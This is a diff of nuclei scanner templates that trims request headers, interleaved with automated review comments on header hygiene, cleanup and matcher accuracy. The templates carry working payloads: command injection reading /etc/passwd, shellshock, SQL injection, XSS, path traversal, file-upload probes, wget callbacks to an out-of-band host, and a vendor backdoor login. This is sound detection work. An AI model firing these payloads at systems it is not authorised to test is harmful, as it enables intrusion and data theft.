diff --git a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml index 8dc442db63..94cac428de 100644 --- a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml +++ b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml @@ -12,14 +12,10 @@ requests: - | POST /Upload/upload_file.php?l=test HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8 Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8 Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6 - Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv - Content-Length: 183 ------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name="file"; filename="test.php" @@ -31,7 +27,6 @@ requests: - | GET /Upload/test/test.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 req-condition: true matchers: diff --git a/vulnerabilities/other/couchdb-adminparty.yaml b/vulnerabilities/other/couchdb-adminparty.yaml index cf0c635784..a7af445594 100644 --- a/vulnerabilities/other/couchdb-adminparty.yaml +++ b/vulnerabilities/other/couchdb-adminparty.yaml @@ -11,8 +11,7 @@ requests: - method: GET path: - '{{BaseURL}}/_users/_all_docs' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word diff --git a/vulnerabilities/other/eyou-email-rce.yaml b/vulnerabilities/other/eyou-email-rce.yaml index 9195b0191e..37cae61ecc 100644 --- a/vulnerabilities/other/eyou-email-rce.yaml +++ b/vulnerabilities/other/eyou-email-rce.yaml 
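Review bot: The request keeps a hard-coded `Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6` after the other browser-noise headers were removed. A fixed session id is either dead weight (if the upload is unauthenticated) or an accidental session-fixation value shared by every scanner running this template; if a cookie is needed at all, `{{randstr}}` would be the safer value. The template also writes `test.php` to `/Upload/test/test.php` with a static name and never removes it, the kind of side effect this commit tags `intrusive` in the flink and consul templates — consider the same tag here (info block is outside the hunk).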
@@ -12,10 +12,6 @@ requests: - | POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36 - Content-Length: 25 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded type='|cat /etc/passwd||' diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index c5e0e08aeb..f9c3d234be 100644 --- a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -12,7 +12,6 @@ requests: - | GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: */* matchers-condition: and diff --git a/vulnerabilities/other/gloo-unauth.yaml b/vulnerabilities/other/gloo-unauth.yaml index 4a27ed3b2d..21b04e340f 100644 --- a/vulnerabilities/other/gloo-unauth.yaml +++ b/vulnerabilities/other/gloo-unauth.yaml @@ -11,7 +11,6 @@ requests: path: - '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails' headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" Content-type: "application/grpc-web+proto" Referer: "{{BaseURL}}/admin/" diff --git a/vulnerabilities/other/hashicorp-consul-rce.yaml b/vulnerabilities/other/hashicorp-consul-rce.yaml index d69e9f5708..fc90bf1e5d 100644 --- a/vulnerabilities/other/hashicorp-consul-rce.yaml +++ b/vulnerabilities/other/hashicorp-consul-rce.yaml 
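Review bot: `Content-type: "application/grpc-web+proto"` in gloo-unauth uses inconsistent header-name casing, while the same commit fixes `content-type` to `Content-Type` in hasura-graphql-ssrf. Wire semantics are unaffected, but for consistency write `Content-Type: "application/grpc-web+proto"`.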
@@ -5,17 +5,13 @@ info: author: pikpikcu severity: critical reference: https://www.exploit-db.com/exploits/46074 - tags: hashicorp,rce,oob + tags: hashicorp,rce,oob,intrusive requests: - raw: - | # Create USER PUT /v1/agent/service/register HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 205 { "ID": "{{randstr}}", diff --git a/vulnerabilities/other/hasura-graphql-ssrf.yaml b/vulnerabilities/other/hasura-graphql-ssrf.yaml index f54c005b18..ab8bbe4a7a 100644 --- a/vulnerabilities/other/hasura-graphql-ssrf.yaml +++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -11,13 +11,8 @@ requests: - | POST /v1/query HTTP/1.1 Host: {{Hostname}} - Content-Length: 381 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - content-type: application/json + Content-Type: application/json Accept: */* - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close { "type":"bulk", diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml index 95572c2656..6765dc8577 100644 --- a/vulnerabilities/other/hiboss-rce.yaml +++ b/vulnerabilities/other/hiboss-rce.yaml @@ -12,16 +12,11 @@ requests: - | GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 - | GET /poc.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 matchers-condition: and matchers: 
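Review bot: The hashicorp-consul-rce request registers a service with `"ID": "{{randstr}}"` and nothing visible deregisters it, so every scan leaves a random service in the target's catalog; the added `intrusive` tag is right, but cleanup is cheap. Consul exposes `PUT /v1/agent/service/deregister/{{randstr}}`, which could be sent as a final request once the matcher has what it needs. The rest of the body and any later requests are outside the hunk, so this may already be handled.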
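Review bot: The hiboss-rce hunk removes `Content-Type: application/x-www-form-urlencoded; charset=UTF-8` from the second, body-less GET but leaves the identical header on the first GET, which is also body-less. A Content-Type on a GET with no body is meaningless; drop it from the first request as well. The payload also writes `poc.txt` into the web root with a fixed name and nothing removes it — a `{{randstr}}.txt` name in both requests, or the `intrusive` tag, would be appropriate (info block outside the hunk).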
diff --git a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml index 89620cd0e4..a4301b8ce5 100644 --- a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml @@ -13,9 +13,7 @@ requests: POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 fullPath=/etc/passwd @@ -23,9 +21,7 @@ requests: POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 fullPath=/Windows/win.ini diff --git a/vulnerabilities/other/huawei-router-auth-bypass.yaml b/vulnerabilities/other/huawei-router-auth-bypass.yaml index 8ef99600e6..a094938e84 100644 --- a/vulnerabilities/other/huawei-router-auth-bypass.yaml +++ b/vulnerabilities/other/huawei-router-auth-bypass.yaml @@ -14,13 +14,8 @@ requests: - | GET /api/system/deviceinfo HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Referer: {{BaseURL}} - X-Requested-With: XMLHttpRequest - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/other/jeewms-lfi.yaml b/vulnerabilities/other/jeewms-lfi.yaml index 14c348eee1..a269c40da8 100644 --- a/vulnerabilities/other/jeewms-lfi.yaml +++ b/vulnerabilities/other/jeewms-lfi.yaml 
@@ -12,13 +12,11 @@ requests: - | #linux GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - | #windows GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index fd92d1f28d..95f977e802 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -12,8 +12,6 @@ requests: - | POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4271.0 Safari/537.36 - X-Requested-With: XMLHttpRequest Content-Type: application/json {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index dd5701ed28..ae79e71a41 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml 
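Review bot: Both jeewms-lfi GET requests keep `Content-Type: application/x-www-form-urlencoded` although neither carries a body, the same dead header this commit removes from the second hiboss-rce request. Drop both lines. The `#linux` / `#windows` markers are useful; the yamllint form `# linux` / `# windows` (space after the hash) would match the rest of the repository.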
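Review bot: The jfrog-unauth-build-exposed hunk removes `X-Requested-With: XMLHttpRequest` together with the User-Agent, but unlike the User-Agent that header can be functional: Artifactory's `/ui/api` endpoints are commonly reported to reject requests that lack it. If that holds, the template stops matching on vulnerable and fixed instances alike. Verify against a live instance before dropping it, or keep the line with `# required by the Artifactory UI API` above it.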
@@ -14,11 +14,7 @@ requests: POST /http/index.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index 7a15fb4b13..2f24495c6d 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -16,12 +16,8 @@ requests: - | POST /http/index.php HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close requester=login&request=login¶ms=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] diff --git a/vulnerabilities/other/keycloak-xss.yaml b/vulnerabilities/other/keycloak-xss.yaml index f35e230373..ba87129f63 100644 
--- a/vulnerabilities/other/keycloak-xss.yaml +++ b/vulnerabilities/other/keycloak-xss.yaml @@ -13,9 +13,6 @@ requests: POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Content-Type: application/x-www-form-urlencoded {"":1} diff --git a/vulnerabilities/other/landray-oa-fileread.yaml b/vulnerabilities/other/landray-oa-fileread.yaml index 03348be0ca..89b603702d 100644 --- a/vulnerabilities/other/landray-oa-fileread.yaml +++ b/vulnerabilities/other/landray-oa-fileread.yaml @@ -12,11 +12,7 @@ requests: - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 - Connection: close - Content-Length: 44 Accept: */* - Accept-Language: en Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}} @@ -24,11 +20,7 @@ requests: - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 - Connection: close - Content-Length: 44 Accept: */* - Accept-Language: en Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///c://windows/win.ini"}} diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml index d9a923a421..c8b3ae4704 100644 --- a/vulnerabilities/other/maian-cart-preauth-rce.yaml +++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml 
@@ -16,31 +16,21 @@ requests: - | GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: */* - Connection: close - | POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: application/json, text/javascript, /; q=0.01 - Connection: close Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Pragma: no-cache - Cache-Control: no-cache - Content-Length: 97 cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e - | GET /product-downloads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: */* - Connection: close extractors: - type: regex diff --git a/vulnerabilities/other/mida-eframework-xss.yaml b/vulnerabilities/other/mida-eframework-xss.yaml index 743d669bdd..93bffe41df 100644 --- a/vulnerabilities/other/mida-eframework-xss.yaml +++ b/vulnerabilities/other/mida-eframework-xss.yaml @@ -11,7 +11,6 @@ requests: - | POST /MUP/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/MUP @@ -22,6 +21,7 @@ requests: - type: status status: - 200 + - type: word words: - '">' \ No newline at end of file diff --git a/vulnerabilities/other/mirai-unknown-rce.yaml b/vulnerabilities/other/mirai-unknown-rce.yaml index 49b88d2924..bb1ef6443a 100644 --- a/vulnerabilities/other/mirai-unknown-rce.yaml +++ b/vulnerabilities/other/mirai-unknown-rce.yaml @@ -13,9 +13,7 @@ requests: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 - Connection: keep-alive Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 key=';`wget http://{{interactsh-url}}`;# 
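Review bot: The maian-cart-preauth-rce sequence creates `{{randstr}}.php` via `cmd=mkfile`, writes PHP into it with `cmd=put`, and fetches it from `/product-downloads/`, but no request removes the file afterwards. elFinder exposes `cmd=rm&targets[]={{hash}}`, so a fourth request could delete it after the extractor has run; at minimum the template should carry the `intrusive` tag this commit adds to flink and consul (info block outside the hunk). The dropped `X-Requested-With` header may also matter for an `ajax-ops` endpoint — worth a live check before merging.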
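Review bot: The word matcher `'">'` in mida-eframework-xss will match virtually any HTML page (every `<a href="...">` contains that sequence), so together with the `200` status matcher the template is close to a guaranteed false positive. Match the reflected payload instead: the POST body is outside the hunk, but the `words` entry should be the specific string injected there, not the two-character suffix. `Referer: {{Hostname}}/MUP` also lacks a scheme; the optilink hunk in this commit uses `{{BaseURL}}` for the same header.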
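Review bot: The mirai-unknown-rce raw request has no `Host: {{Hostname}}` line — the request line is followed directly by `Content-Type`, whereas every other raw request in this commit sets Host explicitly. nuclei may fill it from the target URL, but on name-based virtual hosts the omission can route the request to the wrong site. Add `Host: {{Hostname}}` directly after `POST /cgi-bin/login.cgi HTTP/1.1`.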
diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 9bb69eefdd..1524463563 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -15,20 +15,13 @@ requests: - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip + matchers-condition: and matchers: diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml index fcbe0611ec..9b4442dcd8 100644 --- a/vulnerabilities/other/netgear-wnap320-rce.yaml +++ b/vulnerabilities/other/netgear-wnap320-rce.yaml @@ -14,10 +14,7 @@ requests: - | POST /boardDataWW.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive Content-Type: application/x-www-form-urlencoded macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit diff --git a/vulnerabilities/other/oa-tongda-path-traversal.yaml b/vulnerabilities/other/oa-tongda-path-traversal.yaml index 80503ebdaa..56aa950f64 100644 --- a/vulnerabilities/other/oa-tongda-path-traversal.yaml +++ b/vulnerabilities/other/oa-tongda-path-traversal.yaml @@ -12,8 +12,6 @@ requests: - | POST /ispirit/interface/gateway.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 43 Content-Type: application/x-www-form-urlencoded json={"url":"/general/../../mysql5/my.ini"} 
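Review bot: After the cleanup the two netgear-router-auth-bypass requests are byte-identical (`GET /WAN_wan.htm?.gif` with the same `Accept: */*`), and nothing in the hunk says why the request is sent twice. Presumably the device answers the repeated request differently once the first has been challenged, but a reader will take the duplicate for a copy-paste error. Add a comment above the second request, such as `# intentional duplicate: the second identical request is the one expected to bypass the auth check`, worded to match what the matcher (outside the hunk) actually verifies.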
diff --git a/vulnerabilities/other/oa-v9-uploads-file.yaml b/vulnerabilities/other/oa-v9-uploads-file.yaml index b008ebe22d..7f4da77bff 100644 --- a/vulnerabilities/other/oa-v9-uploads-file.yaml +++ b/vulnerabilities/other/oa-v9-uploads-file.yaml @@ -13,13 +13,8 @@ requests: - | POST /page/exportImport/uploadOperation.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 - Content-Length: 216 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Origin: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo - Connection: close ------WebKitFormBoundaryFy3iNVBftjP6IOwo Content-Disposition: form-data; name="file"; filename="poc.jsp" @@ -31,7 +26,6 @@ requests: - | GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 req-condition: true matchers: diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index 7c4f59db40..f79ef39c18 100644 --- a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml 
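Review bot: `Origin: {{Hostname}}` in oa-v9-uploads-file expands to `host[:port]` without a scheme, which is not a valid Origin; the optilink hunk in this commit replaces its equivalent header with `{{BaseURL}}`. Use `Origin: {{BaseURL}}` here too. The upload also writes `poc.jsp` with a static name to `/page/exportImport/fileTransfer/poc.jsp` and never removes it — a `{{randstr}}.jsp` filename used in both requests avoids collisions between scans, and the `intrusive` tag belongs on this template (info block outside the hunk).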
@@ -14,17 +14,13 @@ requests: - raw: - | POST /boaform/admin/formTracert HTTP/1.1 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Origin: http://{{Hostname}} - Connection: keep-alive - Referer: http://{{Hostname}}/diag_ping_admin_en.asp - Upgrade-Insecure-Requests: 1 Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/diag_ping_admin_en.asp User: e8c Password: e8c - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1" diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 9c2df26245..59fe7b7f44 100644 --- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -11,8 +11,10 @@ requests: - method: GET path: - "{{BaseURL}}" + headers: User-Agent: zerodiumvar_dump(233*233); + matchers-condition: and matchers: diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml index 427bf5239a..629eb80d17 100644 --- a/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/vulnerabilities/other/powercreator-cms-rce.yaml @@ -12,8 +12,6 @@ requests: - | POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 225 Content-Disposition: form-data;name="file1";filename="poc.aspx"; Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136 
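Review bot: The body `target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1"` ends with a lone `"` after `127.0.0.1`, which looks like a leftover from copying the PoC rather than part of the injection; if the original exploit does not send it, drop it, and either way a one-line comment above the body explaining that the backtick-wrapped `wget` is the injected command would help the next reader. The `Origin`/`Referer` switch to `{{BaseURL}}` is the right call since `{{Hostname}}` carries no scheme. The matchers are outside the hunk.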
@@ -27,8 +25,6 @@ requests: - | GET /ResourcePic/{{endpoint}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip extractors: - type: regex diff --git a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml index aae82c8c57..dea9993e30 100644 --- a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml +++ b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml @@ -12,14 +12,12 @@ requests: - | POST /directdata/direct/router HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 - Content-Length: 178 {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} + - | GET /poc.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 matchers-condition: and matchers: diff --git a/vulnerabilities/other/rce-shellshock-user-agent.yaml b/vulnerabilities/other/rce-shellshock-user-agent.yaml index ddca7fb8fe..03aef64b1d 100644 --- a/vulnerabilities/other/rce-shellshock-user-agent.yaml +++ b/vulnerabilities/other/rce-shellshock-user-agent.yaml @@ -8,10 +8,12 @@ info: requests: - method: GET - headers: - User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" path: - "{{BaseURL}}/cgi-bin/status" + + headers: + User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" + matchers: - type: regex regex: diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml index 393ae08a2a..c08699eb6d 100644 --- a/vulnerabilities/other/rconfig-rce.yaml +++ b/vulnerabilities/other/rconfig-rce.yaml 
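Review bot: The qi-anxin-netkang payload writes `/var/www/html/poc.txt` with a fixed name and the follow-up `GET /poc.txt` never cleans it up, so every scan leaves a world-readable copy of `/etc/passwd` in the firewall's web root. Use `{{randstr}}.txt` in both requests so concurrent scans do not collide, add a final request that removes the file through the same `deleteImage` injection (the same `data` array with `;rm -f /var/www/html/<name>.txt`), and tag the template `intrusive` (the `info` block is outside the hunk).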
@@ -5,9 +5,6 @@ info: author: dwisiswant0 severity: high tags: rconfig,rce - - # This template supports the user creation part only. - # To triggering an RCE, see reference[2]. reference: - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - https://www.exploit-db.com/exploits/48878 @@ -18,16 +15,13 @@ requests: POST /lib/crud/userprocess.php HTTP/1.1 Host: {{Hostname}} Accept: */* - User-Agent: python-requests/2.23.0 - Connection: close Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb - Upgrade-Insecure-Requests: 1 - Cookie: PHPSESSID=pdnuclei + Cookie: PHPSESSID={{randstr}} --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="username" - pdnuclei + {{randstr}} --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="passconf" @@ -39,7 +33,7 @@ requests: --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="email" - nuclei@projectdiscovery.io + test@{{randstr.tld}} --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="editid" @@ -58,7 +52,8 @@ requests: matchers: - 